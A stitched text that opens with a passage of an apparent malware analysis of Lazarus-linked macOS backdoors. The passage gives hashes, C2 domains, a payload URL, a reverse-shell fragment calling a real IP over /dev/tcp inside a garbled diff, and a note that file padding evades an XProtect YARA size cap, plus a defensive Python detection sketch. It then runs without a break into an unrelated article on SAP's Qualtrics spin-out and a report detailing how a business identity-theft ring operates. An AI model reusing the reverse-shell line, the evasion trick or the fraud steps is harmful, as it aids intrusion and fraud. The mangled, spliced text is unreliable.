The main purpose of Cryptoistic appears to be to entrap users into creating a single account with the fake platform from which to manage multiple accounts on legitimate platforms such as kraken.com, huobi.por, and binance.com.

But perhaps most interesting of all is the hardcoded URL, "http://applepkg.com/product/new/iContact.pkg", which despite the .pkg suffix, in fact returns a Mach-O payload and drops it at /tmp/.signal_tmp.

The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files.

3. OSX.Casso | Backdoors Galore

At the same time as TinkaOTP, CoinGoTrade and Cryptoistic began circulating, so too did a family of lightweight backdoor binaries, written primarily in Objective-C and C and making heavy use of the standard C libraries built into the operating system. For convenience, we call these closely-related variants OSX.Casso (the reason will become clear shortly).

The first of these appeared on VirusTotal on June 1st with the file name “osxari”.

3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837

Several variants followed quickly after:

e63640c53204a59ba59f2c310964149ca3616d79adc40a6c3abd5bf669511756
65cc7663fa5c5665ad5d9c6bec2b6257612f9f0c0ce7e4399e6dc8b464ea88c0
035089b4ef4a981f43455ebee7963af9e7502170ca206458f96be668b1e3674a
(UPX PACKED; unpacks to: 85d7379b7b82d6b7868f64203a444a5098c72ed7ccff6d1dbb536389a5be5a9c)

and, later

2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b

The last of these was uploaded with the filename “cassoosx”. A quick search revealed that there is also a Windows variant cassou.exe (hence the name OSX.Casso):

90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b

What makes these macOS samples all of a piece can be seen from a diff of their Symbol tables, which are almost identical across the range of samples and include heavy use of the built-in libcurl.4.dylib.

A diff of the embedded strings also reveals some of the significant differences between the first and most recent of OSX.Casso samples:

diff -y  /dev/tcp/160.20.147.253/8443 0&1
_webident_f				 | _media_1
_webident_s				 | _media_2
https://fudcitydelivers.com/net.php	 | https://lastedforcast.com/list.php
https://fudcitydelivers.com/net.php	 | https://lastedforcast.com/list.php
https://sctemarkets.com/net.php		 | https://audiopodcasts.co/verify.php
xdns					 | darwin
					 > @_printf

The samples are almost identical except that “cassoosx” includes a reverse shell and different C2 domains. All of the samples except cassoosx are around 32KB in size, but cassoosx has also been padded with several megabytes of junk printf calls, quite possibly to beat YARA rules that specify a maximum file size, such as those in Apple’s static signature scanner XProtect.

Here we see the XProtect YARA rule for OSX.Casso:

rule XProtect_MACOS_b17a97e
{
    meta:
        description = "MACOS.b17a97e"
    strings:
        $s1 = { 89 C1 C1 E9 07 48 69 C9 11 08 04 02 48 C1 E9 20 69 C9 80 3F 00 00 F7 D9 }
    condition:
        Macho and filesize < 100KB and all of them
}

Although the rule’s single $s1 string will match the cassoosx sample, the detection fails because the binary is well over the 100KB maximum specified in the condition, thanks to the padding:
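To make the size-cap problem concrete, here is a small Python stand-in for that rule, added as an example for this post (it is not Apple’s or SentinelOne’s code). It approximates YARA’s Macho check by magic bytes, builds constructed sample bytes rather than using real Mach-O files, pads one of them with a hypothetical repeated junk stub, and shows the capped rule missing the padded sample while the bare byte pattern and a crude padding heuristic still flag it:

```python
"""Stand-in matcher for the XProtect rule above, written for this post as an
added example (not Apple's or SentinelOne's code). It shows the size-capped
rule missing a padded sample that the same byte pattern still identifies,
plus a crude padding heuristic. Samples are constructed, not real Mach-Os."""
from collections import Counter

# The $s1 hex string from XProtect_MACOS_b17a97e, taken from the rule text.
S1 = bytes.fromhex(
    "89 C1 C1 E9 07 48 69 C9 11 08 04 02 48 C1 E9 20 69 C9 80 3F 00 00 F7 D9"
)

# YARA's "100KB" literal means 100 * 1024 bytes.
XPROTECT_MAX_SIZE = 100 * 1024

# Mach-O magic values: thin 32/64-bit in both byte orders, and fat headers.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # MH_MAGIC / MH_CIGAM
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # MH_MAGIC_64 / MH_CIGAM_64
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",  # FAT_MAGIC / FAT_CIGAM
}


def is_macho(data):
    """Approximates YARA's `Macho` check by looking at the 4-byte magic."""
    return data[:4] in MACHO_MAGICS


def xprotect_rule_matches(data):
    """Condition as written in the rule: Macho and filesize < 100KB and all of them."""
    return is_macho(data) and len(data) < XPROTECT_MAX_SIZE and S1 in data


def pattern_only_matches(data):
    """The same rule with the filesize cap dropped."""
    return is_macho(data) and S1 in data


def padding_ratio(data, chunk=16):
    """Share of the file occupied by its single most common chunk-sized block.

    A file bulked out with thousands of identical junk call stubs collapses
    to one dominant block, while ordinary code spreads across many.
    """
    blocks = Counter(data[i:i + chunk] for i in range(0, len(data) - chunk + 1, chunk))
    if not blocks:
        return 0.0
    return blocks.most_common(1)[0][1] / sum(blocks.values())


def triage(samples):
    """Run all three checks over a {name: bytes} mapping and return a report."""
    return {
        name: {
            "size": len(data),
            "xprotect_hit": xprotect_rule_matches(data),
            "pattern_hit": pattern_only_matches(data),
            "padding_ratio": round(padding_ratio(data), 4),
        }
        for name, data in samples.items()
    }


# Hypothetical 16-byte stub standing in for one repeated junk printf call.
JUNK_STUB = b"\x48\x8d\x3d\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x90\x90\x90\x90"


def build_sample(pad_bytes=0):
    """Constructed sample: 64-bit LE Mach-O magic, varied filler, the $s1
    sequence, more filler, then `pad_bytes` of the repeated junk stub."""
    body = b"\xcf\xfa\xed\xfe" + bytes(range(60)) + S1 + bytes(range(60, 120))
    return body + JUNK_STUB * (pad_bytes // len(JUNK_STUB))


if __name__ == "__main__":
    samples = {
        "osxari-like (small)": build_sample(),
        "cassoosx-like (padded)": build_sample(3 * 1024 * 1024),
    }
    for name, row in triage(samples).items():
        print(name, row)
```

Running it reports the small sample as hit by both checks and the padded one as hit only by the uncapped pattern, with a padding ratio close to 1.0.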

A further change across OSX.Casso samples can be seen in the hardcoded User Agent strings and the version of Chrome that they denote, with the osxari User Agent encoded as follows:

3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36

and all later samples including cassoosx updated to Chrome 83:

2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

The osxari backdoor is itself an evolution of an older Lazarus-related executable, ‘Flash Player’, distributed in the malicious Album.app. Here we see the same basic methods and use of libcurl in Album.app’s executable, ‘Flash Player’, but there have been a few revisions in the 2020 code:

(left: Flash Player; right: osxari):

After osxari, all later samples of OSX.Casso begin to include the reverse shell. Unlike the older Flash Player sample, none include a hardcoded persistence LaunchAgent or LaunchDaemon.

4. Emerging Threats | WatchCat and MediaRemote

As this post was in preparation, an update to Apple’s XProtect signatures late last week revealed yet another Lazarus group Mach-O that differs significantly from those discussed above.

Two new rules in XProtect identify yet another User Agent string, this time specifying older versions of both macOS and Safari:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15

The rules also specify strings for “MediaRemote.app” and “com.apple.watchcat.plist”. Searches on VirusTotal have only revealed one sample so far:

3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93

Detections have been increasing rapidly over the last 14 days as signature-based solutions have caught up:

Although there are some overlaps with the earlier backdoor samples (e.g., the use of “/usr/lib/libcurl.4.dylib”) and the trojanized OTP apps (e.g., inclusion of a hardcoded LaunchDaemon), there is also much more to this malware that has not been seen in the other samples, including use of a WebShell and an onboard crc32 table for decrypting a config file.

The symbol table also reveals an old friend from earlier Lazarus campaigns, _MsgTroyInfo.

While analysis of watchcat is still ongoing and we have yet to see an in-the-wild infection, it’s clear that the rapid iteration of all these various Lazarus-related malware samples shows the actor is heavily invested in the macOS platform.

Conclusion

All of the samples reviewed above have appeared in the last eight to ten weeks and are evidence that threat actors behind the Lazarus group are pursuing several distinct campaigns, using a variety of technologies, and are themselves keeping up-to-date with the Apple platform. These are not actors merely porting Windows malware to macOS, but rather Mac-specific developers deeply invested in writing custom malware for Apple’s platform. Primarily, the samples we have reviewed here appear to be designed to steal cryptocurrency and maintain backdoors into their targets’ devices, but there is clearly much more to be learned about these campaigns. The SentinelOne Platform protects users against all the samples reviewed in this post. For more information about the SentinelOne macOS agent, see here.

IOCS & Samples

SAP will spin out its $8B spin-in Qualtrics acquisition

Well, this isn’t a story you see every day.

Less than two years after German software giant SAP snatched experience management platform Qualtrics for $8 billion days before the startup’s IPO debut, it has now decided to spin out the company in a brand new IPO.

In a press statement released Sunday, SAP said that Qualtrics had seen cloud growth “in excess of 40 percent” in a quote attributed to SAP CEO Christian Klein. The company will continue to be run by founder and former CEO Ryan Smith, who joined SAP with Qualtrics and led the organization within the German conglomerate.

SAP will retain majority ownership of the new spin-out. Interestingly, the statement noted that “Ryan Smith intends to be Qualtrics’ largest individual shareholder.”

SAP’s press statement is vague, but the implication is that the move will offer Qualtrics more flexibility to engage with customers and partners outside of its parent company’s dominion.

I am sure my Equity colleague Alex Wilhelm will have much more to analyze tomorrow with his The Exchange column, but SAP’s rapid about-face on the acquisition is a major surprise. While private equity firms will take a company private and sometimes quickly turn it around in an IPO, it is rare to see a large company like SAP make such a dramatic last-minute bid for a company only to reverse that decision just months later.

Given the heated market for SaaS these days though, the path seems clear for Qualtrics’ return to the public markets, particularly if the soon-to-be independent company’s metrics have held up since we last saw its financials. As Wilhelm and his Crunchbase news team wrote back during its S-1 filing:

Qualtrics, unlike most companies going public this year, isn’t a trash fire of losses incurred under the name of growth. It shows that you can grow, and not lose every one of the dollars you have at the same time.

“Isn’t a trash fire” was a high bar back then, but Qualtrics was indeed an outperformer of its peer group. Assuming those fundamentals haven’t changed, it looks like a real win for Qualtrics and Smith, and a save by SAP from whatever strategic plan they decided to change midstream.

Business ID Theft Soars Amid COVID Closures

Identity thieves who specialize in running up unauthorized lines of credit in the names of small businesses are having a field day with all of the closures and economic uncertainty wrought by the COVID-19 pandemic, KrebsOnSecurity has learned. This story is about the victims of a particularly aggressive business ID theft ring that’s spent years targeting small businesses across the country and is now pivoting toward using that access for pandemic assistance loans and unemployment benefits.

Most consumers are likely aware of the threat from identity theft, which occurs when crooks apply for new lines of credit in your name. But the same crime can be far more costly and damaging when thieves target small businesses. Unfortunately, far too many entrepreneurs are simply unaware of the threat or don’t know how to be watchful for it.

What’s more, with so many small enterprises going out of business or sitting dormant during the COVID-19 pandemic, organized fraud rings have an unusually rich pool of targets to choose from.

Short Hills, N.J.-based Dun & Bradstreet [NYSE:DNB] is a data analytics company that acts as a kind of de facto credit bureau for companies: When a business owner wants to open a new line of credit, creditors typically check with Dun & Bradstreet to gauge the business’s history and trustworthiness.

In 2019, Dun & Bradstreet saw more than a 100 percent increase in business identity theft. For 2020, the company estimates an overall 258 percent spike in the crime. Dun & Bradstreet said that so far this year it has received over 4,700 tips and leads where business identity theft or malfeasance are suspected.

“The ferocity of cyber criminals to take advantage of COVID-19 uncertainties by preying on small businesses is disturbing,” said Andrew LaMarca, who leads the global high-risk and fraud team at Dun & Bradstreet.

For the past several months, Milwaukee, Wisc.-based cyber intelligence firm Hold Security has been monitoring the communications among a business ID theft gang apparently operating in Georgia and Florida but targeting businesses throughout the United States. That surveillance has helped to paint a detailed picture of how business ID thieves operate, as well as the tricks they use to gain credit in a company’s name.

Hold Security founder Alex Holden said the group appears to target both active and dormant or inactive small businesses. The gang typically will start by looking up the business ownership records at the Secretary of State website that corresponds to the company’s state of incorporation. From there, they identify the officers and owners of the company, and acquire their Social Security and Tax ID numbers from the dark web and other sources online.

To prove ownership over the hijacked firms, they hire low-wage image editors online to help fabricate and/or modify a number of official documents tied to the business — including tax records and utility bills.

The scammers frequently then file phony documents with the Secretary of State’s office in the name(s) of the business owners, but include a mailing address that they control. They also create email addresses and domain names that mimic the names of the owners and the company to make future credit applications appear more legitimate, and submit the listings to business search websites, such as yellowpages.com.

For both dormant and existing businesses, the fraudsters attempt to create or modify the target company’s accounts at Dun & Bradstreet. In some cases, the scammers create dashboard accounts in the business’s names at Dun & Bradstreet’s credit builder portal; in others, the bad guys have actually hacked existing business accounts at DNB, requesting a new DUNS number for the business (a DUNS number is a unique, nine-digit identifier for businesses).

Finally, after the bogus profiles are approved by Dun & Bradstreet, the gang waits a few weeks or months and then starts applying for new lines of credit in the target business’s name at stores like Home Depot, Office Depot and Staples. Then they go on a buying spree with the cards issued by those stores.

Usually, the first indication a victim has that they’ve been targeted is when the debt collection companies start calling.

“They are using mostly small companies that are still active businesses but currently not operating because of COVID-19,” Holden said. “With this gang, we see four or five people working together. The team leader manages the work between people. One person seems to be in charge of getting stolen cards from the dark web to pay for the reactivation of businesses through the secretary of state sites. Another team member works on revising the business documents and registering them on various sites. The others are busy looking for specific businesses they want to revive.”

Holden said the gang appears to find success in getting new lines of credit with about 20 percent of the businesses they target.

“One’s personal credit is nothing compared to the ability of corporations to borrow money,” he said. “That’s bad because while the credit system may be flawed for individuals, it’s an even worse situation on average when we’re talking about businesses.”

Holden said over the past few months his firm has seen communications between the gang’s members indicating they have temporarily shifted more of their energy and resources to defrauding states and the federal government by filing unemployment insurance claims and applying for pandemic assistance loans with the Small Business Administration.

“It makes sense, because they’ve already got control over all these dormant businesses,” he said. “So they’re now busy trying to get unemployment payments and SBA loans in the names of these companies and their employees.”

PHANTOM OFFICES

Hold Security shared data intercepted from the gang that listed the personal and financial details of dozens of companies targeted for ID theft, including Dun & Bradstreet logins the crooks had created for the hijacked businesses. Dun & Bradstreet declined to comment on the matter, other than to say it was working with federal and state authorities to alert affected businesses and state regulators.

Among those targeted was Environmental Safety Consultants Inc. (ESC), a 37-year-old environmental engineering firm based in Bradenton, Fla. ESC owner Scott Russell estimates his company was initially targeted nearly two years ago, and that he first became aware something wasn’t right when he recently began getting calls from Home Depot’s corporate offices inquiring about the company’s delinquent account.

But Russell said he didn’t quite grasp the enormity of the situation until last year, when he was contacted by the manager of a virtual office space across town who told him about a suspiciously large number of deliveries at an office space that was rented out in his name.

Russell had never rented that particular office. Rather, the thieves had done it for him, using his name and the name of his business. The office manager said the deliveries came virtually non-stop, even though there was apparently no business operating within the rented premises. And in each case, shortly after the shipments arrived someone would show up and cart them away.

“She said we don’t think it’s you,” he recalled. “Turns out, they had paid for a lease in my name with someone else’s credit card. She shared with me a copy of the lease, which included a fraudulent ID and even a vehicle insurance card for a Land Cruiser we got rid of like 15 years ago. The application listed our home address with me and some woman who was not my wife’s name.”

The crates and boxes being delivered to his erstwhile office space were mostly computers and other high-priced items ordered from 10 different Office Depot credit cards that also were not in his name.

“The total value of the electronic equipment that was bought and delivered there was something like $75,000,” Russell said, noting that it took countless hours and phone calls with Office Depot to make it clear they would no longer accept shipments addressed to him or his company. “It was quite spine-tingling to see someone penned a lease in the name of my business and personal identity.”

Even though the virtual office manager had the presence of mind to take photocopies of the driver’s licenses presented by the people arriving to pick up the fraudulent shipments, the local police seemed largely uninterested in pursuing the case, Russell said.

“I went to the local county sheriff’s office and showed them all the documentation I had and the guy just yawned and said he’d get right on it,” he recalled. “The place where the office space was rented was in another county, and the detective I spoke to there about it was interested, but he could never get anyone from my county to follow up.”

RECYCLING VICTIMS

Russell said he believes the fraudsters initially took out new lines of credit in his company’s name and then used those to defraud others in a similar way. One of those victims, who also appears on the gang’s target list obtained by Hold Security, is Mary McMahan, owner of Fan Experiences, an event management company in Winter Park, Fla.

McMahan also had stolen goods from Office Depot and other stores purchased in her company’s name and delivered to the same office space rented in Russell’s name. McMahan said she and her businesses have suffered hundreds of thousands of dollars in fraud, and spent nearly as much in legal fees fending off collections firms and restoring her company’s credit.

McMahan said she first began noticing trouble almost four years ago, when someone started taking out new credit cards in her company’s name. At the same time, her business was used to open a new lease on a virtual office space in Florida that also began receiving packages tied to other companies victimized by business ID theft.

“About four years back, they hit my credit hard for a year, getting all these new lines of credit at Home Depot, Office Depot, Office Max, you name it,” she said. “Then they came back again two years ago and hit it hard for another year. They even went to the [Florida Department of Motor Vehicles] to get a driver’s license in my name.”

McMahan said the thieves somehow hacked her DNB account, and then began adding new officers and locations for her business listing.

“They changed the email and mailing address, and even went on Yelp and Google and did the same,” she said.

McMahan said she’s since locked down her personal and business credit to the point where even she would have a tough time getting a new line of credit or mortgage if she tried.

“There’s no way they can even utilize me anymore because there’s so many marks on my credit stating that it’s been stolen,” she said. “These guys are relentless, and they recycle victims to defraud others until they figure out they can’t recycle them anymore.”

SAY…THAT’S A NICE CREDIT PROFILE YOU GOT THERE…

McMahan says she, too, has filed multiple reports about the crimes with local police, but has so far seen little evidence that anyone is interested in following up on the matter. For now, she is paying Dun & Bradstreet more than $100 a month to monitor her business credit profile.

Dun & Bradstreet does offer a free version of credit monitoring called Credit Signal that lets business owners check their business credit scores and any inquiries made in the previous 14 days up to four times a year. However, those looking for more frequent checks or additional information about specific credit inquiries beyond 14 days are steered toward DNB’s subscription-based services.

Eva Velasquez, president of the Identity Theft Resource Center, a California-based nonprofit that assists ID theft victims, said she finds that troubling.

“When we look at these institutions that are necessary for us to operate and function in society and they start to charge us a fee for a service to fix a problem they helped create through their infrastructure, that’s just unconscionable,” Velasquez said. “We need to take a hard look at the infrastructures that businesses are beholden to and make sure the risk minimization protections they’re entitled to are not fee-based — particularly if it’s a problem created by the very infrastructure of the system.”

Velasquez said it’s unfortunate that small business owners don’t have the same protections afforded to consumers. For example, only recently did the three major consumer reporting bureaus allow all U.S. residents to place a freeze on their credit files for free.

“We’ve done a good job in educating the public that anyone can be a victim of identity theft, and in compelling our infrastructure to provide robust consumer protection and risk minimization processes that are more uniform,” she said. “It’s still not good by any means, but it’s definitely better for consumers than it is for businesses. We currently put all the responsibility on the small business owner, and very little on the infrastructure and processes that should be designed to protect them but aren’t doing a great job, frankly.”

Rather, the onus continues to be on the business owner to periodically check with DNB and state agencies to monitor for any signs of unauthorized changes. Worse still, too many private and public organizations still don’t do a good enough job protecting employee identification and tax ID numbers that are so often abused in business identity theft, Velasquez said.

“You can put alerts and other protections in place, but the problem is you have to go on a department-by-department and case-by-case basis,” she said. “The place to begin is your secretary of state’s office or wherever you file your documents to operate your business.”

For its part, Dun & Bradstreet recently published a blog post outlining recommendations for businesses to ward off identity thieves. DNB says anyone who suspects fraudulent activity on their account should contact its support team.